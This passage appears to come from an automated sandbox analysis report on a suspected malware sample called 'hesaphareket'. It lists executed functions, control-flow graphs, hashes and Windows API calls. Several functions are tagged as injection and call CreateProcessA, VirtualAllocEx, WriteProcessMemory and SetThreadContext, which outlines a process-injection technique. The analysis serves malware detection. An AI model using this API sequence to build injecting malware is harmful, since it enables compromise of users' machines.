ResumeThread 23302->23303 23305 6d57431 23303->23305 23305->23238 23307 6d574b5 Wow64SetThreadContext 23306->23307 23309 6d574fd 23307->23309 23309->23242 23311 6d57470 Wow64SetThreadContext 23310->23311 23313 6d574fd 23311->23313 23313->23242 23315 6d57548 VirtualAllocEx 23314->23315 23317 6d575c5 23315->23317 23317->23252 23319 6d57588 VirtualAllocEx 23318->23319 23321 6d575c5 23319->23321 23321->23252 23323 6d57cc8 CreateProcessA 23322->23323 23325 6d57f13 23323->23325 23325->23325 23327 6d57d51 CreateProcessA 23326->23327 23329 6d57f13 23327->23329 23329->23329 23330 6d5a3d8 23332 6d5a30d 23330->23332 23333 6d5a3db 23330->23333 23331 6d5a573 23333->23331 23335 6d545ac 23333->23335 23336 6d5a668 PostMessageW 23335->23336 23338 6d5a6d4 23336->23338 23338->23333 23349 6d5a3e8 23350 6d5a573 23349->23350 23351 6d5a40e 23349->23351 23351->23350 23352 6d545ac PostMessageW 23351->23352 23352->23351 23353 b54668 23354 b54672 23353->23354 23356 b54758 23353->23356 23357 b5477d 23356->23357 23361 b54858 23357->23361 23365 b54868 23357->23365 23362 b5488f 23361->23362 23363 b5496c 23362->23363 23369 b544b4 23362->23369 23366 b5488f 23365->23366 23367 b5496c 23366->23367 23368 b544b4 CreateActCtxA 23366->23368 23368->23367 23370 b558f8 CreateActCtxA 23369->23370 23372 b559bb 23370->23372 23372->23372

                                                    Executed Functions

                                                    Function 06D5B2B8 Relevance: 5.4, Strings: 4, Instructions: 411COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 338 6d5b2b8-6d5b2c0 339 6d5b2d0-6d5b2f2 338->339 340 6d5b2c2-6d5b2cf 338->340 341 6d5b6a2-6d5b6a7 339->341 342 6d5b2f8-6d5b333 call 6d5b054 call 6d5b064 call 6d5b074 339->342 340->339 344 6d5b6b1-6d5b6b4 341->344 345 6d5b6a9-6d5b6ab 341->345 354 6d5b335-6d5b33f 342->354 355 6d5b346-6d5b366 342->355 347 6d5b6bc-6d5b6c4 344->347 345->344 349 6d5b6ca-6d5b6d1 347->349 354->355 357 6d5b379-6d5b399 355->357 358 6d5b368-6d5b372 355->358 360 6d5b3ac-6d5b3cc 357->360 361 6d5b39b-6d5b3a5 357->361 358->357 363 6d5b3df-6d5b3e8 call 6d5b084 360->363 364 6d5b3ce-6d5b3d8 360->364 361->360 367 6d5b40c-6d5b415 call 6d5b094 363->367 368 6d5b3ea-6d5b405 call 6d5b084 363->368 364->363 373 6d5b417-6d5b432 call 6d5b094 367->373 374 6d5b439-6d5b442 call 6d5b0a4 367->374 368->367 373->374 380 6d5b444-6d5b448 call 6d5b0b4 374->380 381 6d5b44d-6d5b469 374->381 380->381 385 6d5b481-6d5b485 381->385 386 6d5b46b-6d5b471 381->386 387 6d5b487-6d5b498 call 6d5b0c4 385->387 388 6d5b49f-6d5b4e7 385->388 389 6d5b475-6d5b477 386->389 390 6d5b473 386->390 387->388 396 6d5b4e9 388->396 397 6d5b50b-6d5b512 388->397 389->385 390->385 400 6d5b4ec-6d5b4f2 396->400 398 6d5b514-6d5b523 397->398 399 6d5b529-6d5b537 call 6d5b0d4 397->399 398->399 409 6d5b541-6d5b56b call 6d5b0e4 399->409 410 6d5b539-6d5b53b 399->410 401 6d5b6d2-6d5b711 400->401 402 6d5b4f8-6d5b4fe 400->402 411 6d5b770-6d5b780 401->411 412 6d5b713-6d5b734 401->412 404 6d5b500-6d5b502 402->404 405 6d5b508-6d5b509 402->405 404->405 405->397 405->400 421 6d5b56d-6d5b57b 409->421 422 6d5b598-6d5b5b4 409->422 410->409 418 6d5b956-6d5b95d 411->418 419 6d5b786-6d5b790 411->419 412->411 420 6d5b736-6d5b73c 412->420 425 6d5b96c-6d5b97f 418->425 426 6d5b95f-6d5b967 call 6d5b218 418->426 423 6d5b792-6d5b799 419->423 424 6d5b79a-6d5b7a4 419->424 427 6d5b73e-6d5b740 420->427 428 6d5b74a-6d5b74f 420->428 421->422 437 6d5b57d-6d5b591 421->437 439 6d5b5c7-6d5b5ee call 6d5b0f4 422->439 440 6d5b5b6-6d5b5c0 422->440 429 6d5b989-6d5ba2a 424->429 430 6d5b7aa-6d5b7ea 424->430 426->425 427->428 432 6d5b751-6d5b755 428->432 433 6d5b75c-6d5b769 428->433 489 6d5ba31-6d5ba67 429->489 490 6d5ba2c 429->490 458 6d5b802-6d5b806 430->458 459 6d5b7ec-6d5b7f2 430->459 432->433 433->411 437->422 450 6d5b606-6d5b60a 439->450 451 6d5b5f0-6d5b5f6 439->451 440->439 455 6d5b625-6d5b641 450->455 456 6d5b60c-6d5b61e 450->456 452 6d5b5f8 451->452 453 6d5b5fa-6d5b5fc 451->453 452->450 453->450 468 6d5b643-6d5b649 455->468 469 6d5b659-6d5b65d 455->469 456->455 462 6d5b833-6d5b84b call 6d5b208 458->462 463 6d5b808-6d5b82d 458->463 460 6d5b7f4 459->460 461 6d5b7f6-6d5b7f8 459->461 460->458 461->458 482 6d5b84d-6d5b852 462->482 483 6d5b858-6d5b860 462->483 463->462 474 6d5b64d-6d5b64f 468->474 475 6d5b64b 468->475 469->349 470 6d5b65f-6d5b66d 469->470 480 6d5b67f-6d5b683 470->480 481 6d5b66f-6d5b67d 470->481 474->469 475->469 488 6d5b689-6d5b6a1 480->488 481->480 481->488 482->483 484 6d5b876-6d5b895 483->484 485 6d5b862-6d5b870 483->485 494 6d5b897-6d5b89d 484->494 495 6d5b8ad-6d5b8b1 484->495 485->484 502 6d5ba71 489->502 503 6d5ba69 489->503 490->489 498 6d5b8a1-6d5b8a3 494->498 499 6d5b89f 494->499 500 6d5b8b3-6d5b8c0 495->500 501 6d5b90a-6d5b953 495->501 498->495 499->495 506 6d5b8f6-6d5b903 500->506 507 6d5b8c2-6d5b8f4 500->507 501->418 508 6d5ba72 502->508 503->502 506->501 507->506 508->508
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1342012341.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6d50000_hesaphareket.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: +L$ +L$ +L$ +L
                                                    • API String ID: 0-1917170596
                                                    • Opcode ID: 0bbe67a2442686374a335fe0f6218ce11cf5cae99cec7b5d10ae85793c4859a4
                                                    • Instruction ID: 130c102b796a643cf8e4cff1e52eb286ec60bf674b6c7f6cb24d4a2c4e7f9f13
                                                    • Opcode Fuzzy Hash: 0bbe67a2442686374a335fe0f6218ce11cf5cae99cec7b5d10ae85793c4859a4
                                                    • Instruction Fuzzy Hash: 6EE1DD30B017048FDBAADB75C460BAEBBF6EF89300F1544AEE945AB691CB35D805CB51
                                                    Function 06D59428 Relevance: .1, Instructions: 74COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1342012341.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6d50000_hesaphareket.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d571b4bf2b9e8660c1735f8538caed6714ec5a3ba51139ff904cccd6244578b5
                                                    • Instruction ID: 03b9274e114f8697536b376572c22982cc11f956ef0a9e61bbce7e2cb84af1fc
                                                    • Opcode Fuzzy Hash: d571b4bf2b9e8660c1735f8538caed6714ec5a3ba51139ff904cccd6244578b5
                                                    • Instruction Fuzzy Hash: B131D4B1D056588BEB58CF6BC91539AFAB2AFC9300F04C1AA8818AA264DB740946CF40
                                                    Function 06D59788 Relevance: .1, Instructions: 67COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1342012341.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6d50000_hesaphareket.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6e3c7a8ede9797d525f49145f2e32e9b2afe96ca54b8b0d8e42eff8d2ca0c357
                                                    • Instruction ID: b1b92a77c908155bf7d6d881887cf8053260a075a090fd5c883ca082083f2d29
                                                    • Opcode Fuzzy Hash: 6e3c7a8ede9797d525f49145f2e32e9b2afe96ca54b8b0d8e42eff8d2ca0c357
                                                    • Instruction Fuzzy Hash: 55210934809268CFDFA4CF14D954BF8B7B8AB49311F06A1DA884EA76A1C7348A85CF40
                                                    Function 06D51F18 Relevance: .1, Instructions: 59COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1342012341.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6d50000_hesaphareket.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: cb41b23c7ab9000a1ebc46669d55f79c359ab42e8a8a48ca068a29d260d443d5
                                                    • Instruction ID: 7d88d7f083ad409eadb10961c5d8c3fc72a0369c2832e514bc6b33c6cb6440f2
                                                    • Opcode Fuzzy Hash: cb41b23c7ab9000a1ebc46669d55f79c359ab42e8a8a48ca068a29d260d443d5
                                                    • Instruction Fuzzy Hash: 6921D6B1D156189BEB58CFA7D8447DEBEF6AFC8300F14C06AD4087A664DB740A4A8F90
                                                    Function 06D59739 Relevance: .1, Instructions: 57COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1342012341.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6d50000_hesaphareket.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c043510b12c04fb0cf0c7a2df978a2e280837091bfa1b70e256cf58da5743fe1
                                                    • Instruction ID: bf0e734cdfae668ecd9e4531eec6ab8dbcb0a504d02b85ff204aa83a2978259a
                                                    • Opcode Fuzzy Hash: c043510b12c04fb0cf0c7a2df978a2e280837091bfa1b70e256cf58da5743fe1
                                                    • Instruction Fuzzy Hash: B411FC34809268CFDFA0DF54D9947F8B7B4EB4A311F026196D84EA6661D7348E85CF40
                                                    Function 06D50548 Relevance: .1, Instructions: 51COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1342012341.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6d50000_hesaphareket.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 31f458c5bac8998e4b4c49abe85324829304f57659ba457da2484738d7a08832
                                                    • Instruction ID: d24be3be7c6c169aa33d33cc1d43d827127159fb52dc76e3ed64672fa33c44f1
                                                    • Opcode Fuzzy Hash: 31f458c5bac8998e4b4c49abe85324829304f57659ba457da2484738d7a08832
                                                    • Instruction Fuzzy Hash: BB11BEB2E056189BEB58CF6BCC0139EFAF7ABC9300F09D076C918A6654EB3445468E55
                                                    Function 00B5CF90 Relevance: 6.1, APIs: 4, Instructions: 133threadCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 294 b5cf90-b5d02f GetCurrentProcess 298 b5d031-b5d037 294->298 299 b5d038-b5d06c GetCurrentThread 294->299 298->299 300 b5d075-b5d0a9 GetCurrentProcess 299->300 301 b5d06e-b5d074 299->301 303 b5d0b2-b5d0cd call b5d578 300->303 304 b5d0ab-b5d0b1 300->304 301->300 307 b5d0d3-b5d102 GetCurrentThreadId 303->307 304->303 308 b5d104-b5d10a 307->308 309 b5d10b-b5d16d 307->309 308->309
                                                    APIs
                                                    • GetCurrentProcess.KERNEL32 ref: 00B5D01E
                                                    • GetCurrentThread.KERNEL32 ref: 00B5D05B
                                                    • GetCurrentProcess.KERNEL32 ref: 00B5D098
                                                    • GetCurrentThreadId.KERNEL32 ref: 00B5D0F1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1331372448.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_b50000_hesaphareket.jbxd
                                                    Similarity
                                                    • API ID: Current$ProcessThread
                                                    • String ID:
                                                    • API String ID: 2063062207-0
                                                    • Opcode ID: fe2ca2c33fa441ff58f3c154ba38df2eabcebaa6d2c9c6fbf1fee3f0d03c7f4c
                                                    • Instruction ID: 9b7e70496138edbea239215cddaf71262b22162bd323addd47d739e51bc0b67c
                                                    • Opcode Fuzzy Hash: fe2ca2c33fa441ff58f3c154ba38df2eabcebaa6d2c9c6fbf1fee3f0d03c7f4c
                                                    • Instruction Fuzzy Hash: F15178B09013498FDB54DFA9D548BDEBBF1EF88304F2485A9E409B72A0D7349849CF65
                                                    Function 00B5CFA0 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 316 b5cfa0-b5d02f GetCurrentProcess 320 b5d031-b5d037 316->320 321 b5d038-b5d06c GetCurrentThread 316->321 320->321 322 b5d075-b5d0a9 GetCurrentProcess 321->322 323 b5d06e-b5d074 321->323 325 b5d0b2-b5d0cd call b5d578 322->325 326 b5d0ab-b5d0b1 322->326 323->322 329 b5d0d3-b5d102 GetCurrentThreadId 325->329 326->325 330 b5d104-b5d10a 329->330 331 b5d10b-b5d16d 329->331 330->331
                                                    APIs
                                                    • GetCurrentProcess.KERNEL32 ref: 00B5D01E
                                                    • GetCurrentThread.KERNEL32 ref: 00B5D05B
                                                    • GetCurrentProcess.KERNEL32 ref: 00B5D098
                                                    • GetCurrentThreadId.KERNEL32 ref: 00B5D0F1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1331372448.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_b50000_hesaphareket.jbxd
                                                    Similarity
                                                    • API ID: Current$ProcessThread
                                                    • String ID:
                                                    • API String ID: 2063062207-0
                                                    • Opcode ID: e1b7734f2d83294e77d85d52abdfb59b21d24e2b7381672b902ffbe8392d8d46
                                                    • Instruction ID: 71620b877a3df08f5931243c4ff59394d5f50280cde4b2c5cd6ce53d4fa16db5
                                                    • Opcode Fuzzy Hash: e1b7734f2d83294e77d85d52abdfb59b21d24e2b7381672b902ffbe8392d8d46
                                                    • Instruction Fuzzy Hash: C35165B09002499FDB64DFAAD548BDEBBF1EF88300F248499E409B72A0D7709848CF65
                                                    Function 06D57CBC Relevance: 1.7, APIs: 1, Instructions: 245processCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 638 6d57cbc-6d57d5d 641 6d57d96-6d57db6 638->641 642 6d57d5f-6d57d69 638->642 647 6d57def-6d57e1e 641->647 648 6d57db8-6d57dc2 641->648 642->641 643 6d57d6b-6d57d6d 642->643 645 6d57d90-6d57d93 643->645 646 6d57d6f-6d57d79 643->646 645->641 649 6d57d7d-6d57d8c 646->649 650 6d57d7b 646->650 658 6d57e57-6d57f11 CreateProcessA 647->658 659 6d57e20-6d57e2a 647->659 648->647 651 6d57dc4-6d57dc6 648->651 649->649 652 6d57d8e 649->652 650->649 653 6d57de9-6d57dec 651->653 654 6d57dc8-6d57dd2 651->654 652->645 653->647 656 6d57dd4 654->656 657 6d57dd6-6d57de5 654->657 656->657 657->657 660 6d57de7 657->660 670 6d57f13-6d57f19 658->670 671 6d57f1a-6d57fa0 658->671 659->658 661 6d57e2c-6d57e2e 659->661 660->653 662 6d57e51-6d57e54 661->662 663 6d57e30-6d57e3a 661->663 662->658 665 6d57e3c 663->665 666 6d57e3e-6d57e4d 663->666 665->666 666->666 667 6d57e4f 666->667 667->662 670->671 681 6d57fb0-6d57fb4 671->681 682 6d57fa2-6d57fa6 671->682 684 6d57fc4-6d57fc8 681->684 685 6d57fb6-6d57fba 681->685 682->681 683 6d57fa8 682->683 683->681 687 6d57fd8-6d57fdc 684->687 688 6d57fca-6d57fce 684->688 685->684 686 6d57fbc 685->686 686->684 690 6d57fee-6d57ff5 687->690 691 6d57fde-6d57fe4 687->691 688->687 689 6d57fd0 688->689 689->687 692 6d57ff7-6d58006 690->692 693 6d5800c 690->693 691->690 692->693 695 6d5800d 693->695 695->695
                                                    APIs
                                                    • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 06D57EFE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1342012341.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6d50000_hesaphareket.jbxd
                                                    Similarity
                                                    • API ID: CreateProcess
                                                    • String ID:
                                                    • API String ID: 963392458-0
                                                    • Opcode ID: 4e529d1a47db2a4560d321e7fe732014501c99bd6cc0ad92fb1ce44f7c9e6331
                                                    • Instruction ID: 2297ae4823f1e74734dcf4d28d6e9289a6a6cf26a2d6fee014d656905116d5c1
                                                    • Opcode Fuzzy Hash: 4e529d1a47db2a4560d321e7fe732014501c99bd6cc0ad92fb1ce44f7c9e6331
                                                    • Instruction Fuzzy Hash: 60A16871D00219CFDF50CF68C841BEDBBB2BF48314F2585AAE848A7690DB759985CF91
                                                    Function 06D57CC8 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 696 6d57cc8-6d57d5d 698 6d57d96-6d57db6 696->698 699 6d57d5f-6d57d69 696->699 704 6d57def-6d57e1e 698->704 705 6d57db8-6d57dc2 698->705 699->698 700 6d57d6b-6d57d6d 699->700 702 6d57d90-6d57d93 700->702 703 6d57d6f-6d57d79 700->703 702->698 706 6d57d7d-6d57d8c 703->706 707 6d57d7b 703->707 715 6d57e57-6d57f11 CreateProcessA 704->715 716 6d57e20-6d57e2a 704->716 705->704 708 6d57dc4-6d57dc6 705->708 706->706 709 6d57d8e 706->709 707->706 710 6d57de9-6d57dec 708->710 711 6d57dc8-6d57dd2 708->711 709->702 710->704 713 6d57dd4 711->713 714 6d57dd6-6d57de5 711->714 713->714 714->714 717 6d57de7 714->717 727 6d57f13-6d57f19 715->727 728 6d57f1a-6d57fa0 715->728 716->715 718 6d57e2c-6d57e2e 716->718 717->710 719 6d57e51-6d57e54 718->719 720 6d57e30-6d57e3a 718->720 719->715 722 6d57e3c 720->722 723 6d57e3e-6d57e4d 720->723 722->723 723->723 724 6d57e4f 723->724 724->719 727->728 738 6d57fb0-6d57fb4 728->738 739 6d57fa2-6d57fa6 728->739 741 6d57fc4-6d57fc8 738->741 742 6d57fb6-6d57fba 738->742 739->738 740 6d57fa8 739->740 740->738 744 6d57fd8-6d57fdc 741->744 745 6d57fca-6d57fce 741->745 742->741 743 6d57fbc 742->743 743->741 747 6d57fee-6d57ff5 744->747 748 6d57fde-6d57fe4 744->748 745->744 746 6d57fd0 745->746 746->744 749 6d57ff7-6d58006 747->749 750 6d5800c 747->750 748->747 749->750 752 6d5800d 750->752 752->752
                                                    APIs
                                                    • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 06D57EFE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1342012341.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6d50000_hesaphareket.jbxd
                                                    Similarity
                                                    • API ID: CreateProcess
                                                    • String ID:
                                                    • API String ID: 963392458-0
                                                    • Opcode ID: 47c77053816bb58a8f3a3b71ed30b081b55ac911701b104fdf4e7a329b04e692
                                                    • Instruction ID: ecaa3548ca9bf0c6e4c9fdf5d1616f680fbfcef5bc90e744b26b329a37af913f
                                                    • Opcode Fuzzy Hash: 47c77053816bb58a8f3a3b71ed30b081b55ac911701b104fdf4e7a329b04e692
                                                    • Instruction Fuzzy Hash: 33917971D00219CFDF60CF68C841BEDBBB2BF48314F2585AAE808A7680DB759985CF91
                                                    Function 00B5AD08 Relevance: 1.7, APIs: 1, Instructions: 198COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 753 b5ad08-b5ad17 754 b5ad43-b5ad47 753->754 755 b5ad19-b5ad26 call b5a02c 753->755 757 b5ad49-b5ad53 754->757 758 b5ad5b-b5ad9c 754->758 761 b5ad3c 755->761 762 b5ad28 755->762 757->758 764 b5ad9e-b5ada6 758->764 765 b5ada9-b5adb7 758->765 761->754 810 b5ad2e call b5afa0 762->810 811 b5ad2e call b5af90 762->811 764->765 766 b5adb9-b5adbe 765->766 767 b5addb-b5addd 765->767 770 b5adc0-b5adc7 call b5a038 766->770 771 b5adc9 766->771 769 b5ade0-b5ade7 767->769 768 b5ad34-b5ad36 768->761 772 b5ae78-b5af38 768->772 775 b5adf4-b5adfb 769->775 776 b5ade9-b5adf1 769->776 773 b5adcb-b5add9 770->773 771->773 803 b5af40-b5af6b GetModuleHandleW 772->803 804 b5af3a-b5af3d 772->804 773->769 779 b5adfd-b5ae05 775->779 780 b5ae08-b5ae11 call b5a048 775->780 776->775 779->780 784 b5ae13-b5ae1b 780->784 785 b5ae1e-b5ae23 780->785 784->785 786 b5ae25-b5ae2c 785->786 787 b5ae41-b5ae45 785->787 786->787 789 b5ae2e-b5ae3e call b5a058 call b5a068 786->789 808 b5ae48 call b5b2a0 787->808 809 b5ae48 call b5b290 787->809 789->787 791 b5ae4b-b5ae4e 794 b5ae71-b5ae77 791->794 795 b5ae50-b5ae6e 791->795 795->794 805 b5af74-b5af88 803->805 806 b5af6d-b5af73 803->806 804->803 806->805 808->791 809->791 810->768 811->768
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00B5AF5E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1331372448.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_b50000_hesaphareket.jbxd
                                                    Similarity
                                                    • API ID: HandleModule
                                                    • String ID:
                                                    • API String ID: 4139908857-0
                                                    • Opcode ID: f617c5254b04fba9e48cd9e513fd8ace0fba5b706510ccc36106accf99eb6da4
                                                    • Instruction ID: a1ef724c7e63b5643420689c0c534d79c072b1d0a1f63d270d43ec3cd09917ea
                                                    • Opcode Fuzzy Hash: f617c5254b04fba9e48cd9e513fd8ace0fba5b706510ccc36106accf99eb6da4
                                                    • Instruction Fuzzy Hash: C9714670A00B058FDB24DF29D44175ABBF1FF88305F108AAEE84AE7A50D775E949CB91
                                                    Function 00B558EC Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 812 b558ec-b559b9 CreateActCtxA 814 b559c2-b55a1c 812->814 815 b559bb-b559c1 812->815 822 b55a1e-b55a21 814->822 823 b55a2b-b55a2f 814->823 815->814 822->823 824 b55a31-b55a3d 823->824 825 b55a40 823->825 824->825 827 b55a41 825->827 827->827
                                                    APIs
                                                    • CreateActCtxA.KERNEL32(?), ref: 00B559A9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1331372448.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_b50000_hesaphareket.jbxd
                                                    Similarity
                                                    • API ID: Create
                                                    • String ID:
                                                    • API String ID: 2289755597-0
                                                    • Opcode ID: fe323a4b4dbd35b95b71d905b8ebcb559fa0cad0b7166b145b6da4415e3fd37b
                                                    • Instruction ID: 826817dd78b60b1f923021f00cd5e9b2b420d04eb8fec8ee1911beba63775aae
                                                    • Opcode Fuzzy Hash: fe323a4b4dbd35b95b71d905b8ebcb559fa0cad0b7166b145b6da4415e3fd37b
                                                    • Instruction Fuzzy Hash: DD41F1B1C00619CFDB24CFA9C894BDDBBF1BF49304F2081AAD449AB255DB75694ACF50
                                                    Function 00B544B4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 828 b544b4-b559b9 CreateActCtxA 831 b559c2-b55a1c 828->831 832 b559bb-b559c1 828->832 839 b55a1e-b55a21 831->839 840 b55a2b-b55a2f 831->840 832->831 839->840 841 b55a31-b55a3d 840->841 842 b55a40 840->842 841->842 844 b55a41 842->844 844->844
                                                    APIs
                                                    • CreateActCtxA.KERNEL32(?), ref: 00B559A9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1331372448.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_b50000_hesaphareket.jbxd
                                                    Similarity
                                                    • API ID: Create
                                                    • String ID:
                                                    • API String ID: 2289755597-0
                                                    • Opcode ID: cd225b1b27b43b511b5d9150649338a65b3f522563944d27816e8427b3673226
                                                    • Instruction ID: 542f0d84899ef66fd73009446d57dcf250820897531d8cd6eb09cd6b26c3fd92
                                                    • Opcode Fuzzy Hash: cd225b1b27b43b511b5d9150649338a65b3f522563944d27816e8427b3673226
                                                    • Instruction Fuzzy Hash: E441E1B0C0061DCBDB24DFAAC8847DEBBF5BF48305F2081AAD409AB255DB756949CF90
                                                    Function 06D5A6FA Relevance: 1.6, APIs: 1, Instructions: 71windowCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 856 6d5a6fa-6d5a701 857 6d5a703-6d5a72d 856->857 858 6d5a69f-6d5a6d2 PostMessageW 856->858 861 6d5a734-6d5a747 857->861 862 6d5a72f 857->862 859 6d5a6d4-6d5a6da 858->859 860 6d5a6db-6d5a6ef 858->860 859->860 865 6d5a749-6d5a756 861->865 866 6d5a758-6d5a773 861->866 862->861 865->866 869 6d5a775 866->869 870 6d5a77d 866->870 869->870
                                                    APIs
                                                    • PostMessageW.USER32(?,00000010,00000000,?), ref: 06D5A6C5
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1342012341.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6d50000_hesaphareket.jbxd
                                                    Similarity
                                                    • API ID: MessagePost
                                                    • String ID:
                                                    • API String ID: 410705778-0
                                                    • Opcode ID: a735d96b64f4e19baeac6cfd1c6b12fd7b837de676e99baf42671a4f61bec5ef
                                                    • Instruction ID: 994361b3916d8c622864752a980f10f3a1f47c44c6e5e9053c16336f27cbbb70
                                                    • Opcode Fuzzy Hash: a735d96b64f4e19baeac6cfd1c6b12fd7b837de676e99baf42671a4f61bec5ef
                                                    • Instruction Fuzzy Hash: B221ACB6D002299FDF20DF99D904BEEBBF4AB48300F1A8159D805B7650C779A944CBA0
                                                    Function 06D57602 Relevance: 1.6, APIs: 1, Instructions: 71injectionCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 845 6d57602-6d57656 848 6d57666-6d576a5 WriteProcessMemory 845->848 849 6d57658-6d57664 845->849 851 6d576a7-6d576ad 848->851 852 6d576ae-6d576de 848->852 849->848 851->852
                                                    APIs
                                                    • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 06D57698
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1342012341.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6d50000_hesaphareket.jbxd
                                                    Similarity
                                                    • API ID: MemoryProcessWrite
                                                    • String ID:
                                                    • API String ID: 3559483778-0
                                                    • Opcode ID: 4dceb9feeb99d0b5382da0641b40bf8959fb268d25b44960eb671a901d02dd31
                                                    • Instruction ID: 8ac107c7cb0979be6d50991945d621b6bb72356d43d5027a27f8742074ae13b2
                                                    • Opcode Fuzzy Hash: 4dceb9feeb99d0b5382da0641b40bf8959fb268d25b44960eb671a901d02dd31
                                                    • Instruction Fuzzy Hash: DF2124B1D003099FDB50DFAAC985BDEBBF5FF48310F10842AE919A7640D778A945CBA0
                                                    Function 06D57608 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 871 6d57608-6d57656 873 6d57666-6d576a5 WriteProcessMemory 871->873 874 6d57658-6d57664 871->874 876 6d576a7-6d576ad 873->876 877 6d576ae-6d576de 873->877 874->873 876->877
                                                    APIs
                                                    • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 06D57698
                                                    Memory Dump Source
